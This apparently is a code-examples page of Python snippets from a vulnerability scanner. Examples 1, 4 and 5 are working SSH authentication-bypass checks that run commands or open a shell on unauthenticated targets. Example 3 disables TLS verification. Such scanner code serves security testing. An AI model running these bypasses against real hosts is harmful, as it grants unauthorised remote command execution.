Exemple #1
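def password_auth_bypass_test(hostname, port):
    """Check whether an SSH server runs a command for an unauthenticated client.

    After the transport handshake the client itself sends a USERAUTH_SUCCESS
    message and then asks for a session. A server that opens the session and
    runs ``whoami`` has accepted a client that never authenticated.

    Args:
        hostname: Host to check.
        port: TCP port of the SSH service (anything ``int()`` accepts).

    Returns:
        True if the command ran and its combined stdout/stderr contains
        ``root``; False if the server refused or could not be reached.
    """
    bufsize = 2048
    command = 'whoami'
    sock = socket.socket()
    transport = None
    try:
        sock.connect((hostname, int(port)))

        message = paramiko.message.Message()
        transport = paramiko.transport.Transport(sock)
        transport.start_client()

        message.add_byte(paramiko.common.cMSG_USERAUTH_SUCCESS)
        transport._send_message(message)

        client = transport.open_session(timeout=10)
        client.exec_command(command)

        stdout = client.makefile("rb", bufsize)
        stderr = client.makefile_stderr("rb", bufsize)
        # errors="replace": undecodable bytes from the remote side must not
        # abort the check with an unhandled UnicodeDecodeError.
        cmd_out = (stdout.read().decode(errors="replace")
                   + stderr.read().decode(errors="replace"))
        print(cmd_out)
        # NOTE(review): a host where the service runs the command as a
        # non-root account is reported as False, i.e. a false negative in the
        # scan result. Confirm that is the intended verdict.
        return 'root' in cmd_out

    except paramiko.SSHException:
        logger.debug("TCPForwarding disabled on remote server can't connect. Not Vulnerable")
        return False
    except socket.error:
        logger.debug("Unable to connect.")
        return False
    finally:
        # The original never released the transport or the socket, leaking a
        # connection (and paramiko's worker thread) per checked host.
        if transport is not None:
            transport.close()
        sock.close()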
Exemple #2
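	def init(self):
		"""Open the record file for this plugin, refusing to reuse an existing path.

		The file is created atomically with O_CREAT | O_EXCL, so there is no
		window between the existence check and the open in which another
		process could create the path or plant a symlink there.

		Raises:
			Exception: if ``self.filename`` already exists.
		"""
		debug_msg = "[PLUGIN] file_record plugin init..."
		logger.debug(debug_msg)
		logger.info("[PLUGIN] The data will be recorded in {}".format(self.filename))
		try:
			# O_APPEND keeps the append semantics of the former 'a+' mode;
			# 0o666 (before umask) matches what the built-in open() creates.
			fd = os.open(
				self.filename,
				os.O_RDWR | os.O_CREAT | os.O_EXCL | os.O_APPEND,
				0o666,
			)
		except FileExistsError:
			# Same exception type and message callers saw before.
			raise Exception("The {} has existed".format(self.filename)) from None
		self.file = os.fdopen(fd, 'a+')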
Exemple #3
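    def poll(self):
        """Fetch pending records from the polling server and decrypt them.

        Makes up to three attempts, one second apart. Each attempt requests
        ``https://<self.server>/poll`` with the correlation id and secret,
        reads ``aes_key`` and ``data`` from the JSON reply and passes every
        entry of ``data`` through ``self.decrypt_data``.

        Returns:
            The list of decrypted entries from the first successful attempt,
            or an empty list if all attempts fail.
        """
        url = f"https://{self.server}/poll"
        # Passed as params so the values are URL-encoded by the HTTP client
        # instead of being spliced raw into the query string.
        query = {"id": self.correlation_id, "secret": self.secret}
        for _ in range(3):
            try:
                # NOTE(review): verify=False turns off TLS certificate
                # validation, so the secret and the returned AES key can be
                # read or altered by anyone able to intercept the connection.
                # Enable verification (or pin the server's CA) unless the
                # server is known to use a self-signed certificate.
                # timeout: without one a stalled server blocks this call
                # indefinitely and the retry loop never advances.
                res = self.session.get(url, params=query, headers=self.headers,
                                       verify=False, timeout=10).json()
                aes_key, data_list = res['aes_key'], res['data']
                return [self.decrypt_data(aes_key, item) for item in data_list]
            except Exception as e:
                # Log the exception type only: HTTP client error messages
                # commonly embed the full request URL, which here carries the
                # secret in its query string.
                logger.debug("poll attempt failed: %s", type(e).__name__)
                time.sleep(1)
        return []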
Exemple #4
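def fake_key_bypass_test(hostname, port, username='******', keyfile=None, command='whoami'):
    """Check whether an SSH server runs a command for a client with an arbitrary key.

    Connects with ``keyfile`` (default ``~/.ssh/id_rsa``) and an empty
    password, runs ``command`` and inspects its standard output.

    Args:
        hostname: Host to check.
        port: TCP port of the SSH service (anything ``int()`` accepts).
        username: Account name presented to the server.
        keyfile: Path to a private key file; defaults to ``~/.ssh/id_rsa``.
        command: Command to run once a session is open.

    Returns:
        True if the command output, stripped of surrounding whitespace, is
        exactly ``root``; False if the key file is missing, the server
        refused, or the host could not be reached.
    """
    client = None
    try:
        if keyfile is None:
            # expanduser also works where HOME is unset, which previously
            # raised an unhandled KeyError.
            keyfile = os.path.join(os.path.expanduser('~'), '.ssh', 'id_rsa')

        # NOTE(review): this mutates a class-level table shared by every
        # paramiko user in the process and never restores it. Any other SSH
        # handling in the same process runs with the patched handler after
        # this call. Confirm that is acceptable, or save and restore the
        # previous entry.
        paramiko.auth_handler.AuthHandler._server_handler_table.update(
            {paramiko.common.MSG_USERAUTH_REQUEST: auth_accept})

        client = paramiko.SSHClient()
        # AutoAddPolicy accepts whatever host key is offered, so the peer's
        # identity is not verified.
        client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
        client.connect(hostname, port=int(port), username=username, password="", pkey=None, key_filename=keyfile)

        stdin, stdout, stderr = client.exec_command(command)
        cmd_output = stdout.read()
        # read() yields bytes ending in a newline; the original compared that
        # to the str 'root', which is never equal, so the test always
        # reported False.
        if isinstance(cmd_output, bytes):
            cmd_output = cmd_output.decode(errors="replace")
        return cmd_output.strip() == 'root'

    except FileNotFoundError:
        logger.debug("Generate a keyfile for tool to bypass remote/local server credentials.")
        return False
    except paramiko.SSHException:
        logger.debug("TCPForwarding disabled on remote server can't connect. Not Vulnerable")
        return False
    except socket.error:
        logger.debug("Unable to connect.")
        return False
    finally:
        # Close on every path; the original closed only after success.
        if client is not None:
            client.close()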
Exemple #5
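def password_auth_bypass_test(hostname, port):
    """Check whether an SSH server opens a shell for an unauthenticated client.

    After the transport handshake the client itself sends a USERAUTH_SUCCESS
    message, then requests a session and a shell. If both requests succeed,
    the server accepted a client that never authenticated.

    Args:
        hostname: Host to check.
        port: TCP port of the SSH service (anything ``int()`` accepts).

    Returns:
        True if the session and shell were granted; False if the server
        refused or could not be reached.
    """
    sock = socket.socket()
    transport = None
    try:
        sock.connect((hostname, int(port)))

        message = paramiko.message.Message()
        transport = paramiko.transport.Transport(sock)
        transport.start_client()

        message.add_byte(paramiko.common.cMSG_USERAUTH_SUCCESS)
        transport._send_message(message)

        client = transport.open_session(timeout=10)
        client.invoke_shell()
        return True

    except paramiko.SSHException:
        logger.debug(
            "TCPForwarding disabled on remote server can't connect. Not Vulnerable"
        )
        return False
    except socket.error:
        logger.debug("Unable to connect.")
        return False
    finally:
        # Only the boolean verdict is returned, so nothing may stay open. The
        # original left the shell channel, transport and socket open on
        # every path.
        if transport is not None:
            transport.close()
        sock.close()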
Exemple #6
 def init(self):
     debug_msg = "[PLUGIN] html_report plugin init..."
     logger.debug(debug_msg)